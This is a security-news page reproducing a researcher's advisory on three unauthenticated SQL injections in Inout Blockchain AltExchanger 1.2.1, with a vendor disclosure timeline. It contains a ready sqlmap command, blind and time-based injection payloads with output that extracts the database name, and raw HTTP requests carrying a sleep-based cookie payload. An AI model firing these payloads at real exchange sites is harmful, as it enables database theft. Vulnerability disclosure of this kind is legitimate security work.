Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-31489: CVEs/Blockchain-AltExchanger-121-sqli.md at main · bigb0x/CVEs

Inout Blockchain AltExchanger 1.2.1 allows index.php/home/about inoutio_language cookie SQL injection.

CVE
#sql#vulnerability#web#windows#apple#google#git#php#auth#chrome#webkit

Information

Vulnerability Name  : Multiple Remote SQL Injections in Inout Blockchain AltExchanger
Product             : Inout Blockchain AltExchanger
version             : 1.2.1
Date                : 2022-05-21
Vendor Site         : https://www.inoutscripts.com/products/inout-blockchain-altexchanger/
Exploit Detail      : https://github.com/bigb0x/CVEs/Blockchain-AltExchanger-121-sqli.md
CVE-Number          : In Progess
Exploit Author      : Mohamed N. Ali @MohamedNab1l

Description

Three SQL injections have been discovered in Blockchain AltExchanger cryptocurrency exchange platform v1.2.1. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.

1- Vulnerable Parameter: symbol (GET)

Vulnerability File: /application/third_party/Chart/TradingView/chart_content/master.php

Sqlmap command:

python sqlmap.py -u “http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652650195&resolution=5&symbol=BTC-BCH” -p symbol --dbms=MySQL --banner --random-agent --current-db

output:

` Parameter: symbol (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: from=1652650195&resolution=5&symbol=BTC-BCH’) AND 7820=7820 AND ('HqKC’=’HqKC

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND (SELECT 1060 FROM (SELECT(SLEEP(5)))WJpc) AND ('rQoO'='rQoO

[16:43:22] [INFO] testing MySQL [16:43:23] [INFO] confirming MySQL [16:43:26] [INFO] the back-end DBMS is MySQL [16:43:26] [INFO] fetching banner [16:43:26] [INFO] resumed: 5.6.50 web application technology: PHP 7.0.33 back-end DBMS: MySQL >= 5.0.0 banner: ‘5.6.50’ [16:43:26] [INFO] fetching current database [16:43:26] [INFO] retrieved: inout_blockchain_altexchanger_db current database: ‘inout_blockchain_altexchanger_db’ `

2- Vulnerable Parameter: marketcurrency (POST)

Vulnerability File: /index.php/coins/update_marketboxslider

HTTP Request:

POST /index.php/coins/update_marketboxslider HTTP/1.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://vulnerable-host.com/ Cookie: inoutio_language=4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip,deflate,br Content-Length: 69 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 Host: vulnerable-host.com Connection: Keep-alive displaylimit=4&marketcurrency=-INJEQT-SQL-HERE**
3- Vulnerable Parameter: Cookie: inoutio_language (GET)

Vulnerability File: /index.php

HTTP Request:

GET /index.php/home/about HTTP/1.1 Referer: https://www.google.com/search?hl=en&q=testing User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 x-requested-with: XMLHttpRequest Cookie: inoutio_language=0’XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR’Z Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip,deflate,br Host: vulnerable-host.com Connection: Keep-alive**
Timeline

2022-05-03: Discovered the bug
2022-05-03: Reported to vendor
2022-05-21: Advisory published

Discovered by

Mohamed N. Ali
@MohamedNab1l
[email protected]

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907